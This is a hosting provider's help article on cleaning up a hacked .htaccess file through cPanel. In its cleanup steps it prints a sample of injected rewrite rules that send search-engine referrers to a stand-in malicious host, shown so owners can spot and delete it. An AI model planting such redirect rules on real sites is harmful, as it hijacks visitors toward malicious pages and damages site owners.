In this article we'll dicuss steps you can take to clean up a .htaccess hack. The .htaccess file is used to primarily setup rewrite rules to control the way your site is accessed. You might not notice that your .htaccess file has been hacked until either a manual investigation, or you happen to get a malware warning on your website that it's redirecting to a malicious site.

Sometimes you might catch down in your web-browser's status bar that a foreign website is attempting to load content on your website, or you might notice a web-browser warning. These can be common signs of a .htaccess hack, you might also notice that you've fallen in search engine rankings. The typical reason for this is that hackers will attempt to hack your .htaccess file so that when search engine bots crawl your website they are redirected to the website that the hacker has put in place instead of your own.

You can do a quick outside spot check using Google's Safe Browsing diagnostic page to see if they've detected anything malicious on your site in their most recent crawl. You would simply want to replace YourDomain.com with your actual domain name in the following URL:

http://google.com/safebrowsing/diagnostic?site=YourDomain.com

You can also read more about the Google Safe Browsing page.

Following the steps below you can learn how to check your .htaccess file for hacks, and how to clean them up if you do find any.

.htaccess hacked clean up steps

  1. Login to your cPanel.
  2. Under the Files section, click on File Manager.
  3. Select the Document Root for: option, and choose your domain from the drop-down.
  4. Ensure that Show Hidden Files is selected.
  5. Then click Go.
  6. file-manager-hidden-files
     
  7. Right-click on the .htaccess file and select Edit.
  8. file-manager-htaccess-edit
     
  9. You might have a text editor encoding dialog box pop-up, you can simply click on Edit.
  10. Scroll up and down the document and you'll want to look for any code that seems to be out of place, more than likely you'll see something along the following lines if your .htaccess file has been hacked:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
    </IfModule>
    

    What this rewrite code is attempting to do is checking for the referrer of a request, if it's a popular search engine they are redirecting it to their MaliciousDomain.tld website and trying to load the bad.php malicious script.

    Because these RewriteCond conditional statements wouldn't match for yourself, and only for search engine bots, sometimes these types of hacks can go unnoticed for some time. Unfortunately the longer they're active the more potential it has at affecting your search engine ranking.

  11. To remove these malicious rewrites you can simply highlight all of the text and hit Delete on your keyboard and then click on Save Changesat the top-right to save the file.

    If you aren't 100% confident that you've found malicious redirect code, we would recommend backing up your .htaccess file prior to making edits to it. This can be accomplished by simply right-clicking on the .htaccess file in the File Manager, selecting Copy and then choosing a copy path such as /public_html/.htaccess-BAK, then finally clicking on Copy File(s).

You should now understand how to locate and remove a .htaccess hack that could be causing your website to do a malicious redirection. You'll more than likely also want to read about steps to take after a hack for more information on how to prevent hacks like this from taking place.

If you're on a VPS or dedicated server you might also wish to read about how to clean up a code injection attack if more than just your .htaccess file has been hacked.

Did you find this article helpful?

We value your feedback!

Why was this article not helpful? (Check all that apply)
The article is too difficult or too technical to follow.
There is a step or detail missing from the instructions.
The information is incorrect or out-of-date.
It does not resolve the question/problem I have.
How did you find this article?
Please tell us how we can improve this article:
Email Address
Name

new! - Enter your name and email address above and we will post your feedback in the comments on this page!

Like this Article?

Post a Comment

Name:
Email Address:
Phone Number:
Comment:
Submit

Please note: Your name and comment will be displayed, but we will not show your email address.

News / Announcements

WordPress wp-login.php brute force attack
Updated 2014-07-17 06:43 pm EST
Hits: 200890

Related Questions

Here are a few questions related to this article that our customers have asked:
Ooops! It looks like there are no questions about this page.
Would you like to ask a question about this page? If so, click the button below!
Ask a Question

Need more Help?

Search

Ask the Community!

Get help with your questions from our community of like-minded hosting users and InMotion Hosting Staff.

Current Customers

Chat: Click to Chat Now E-mail: support@InMotionHosting.com
Call: 888-321-HOST (4678) Ticket: Submit a Support Ticket

Not a Customer?

Get web hosting from a company that is here to help. Sign up today!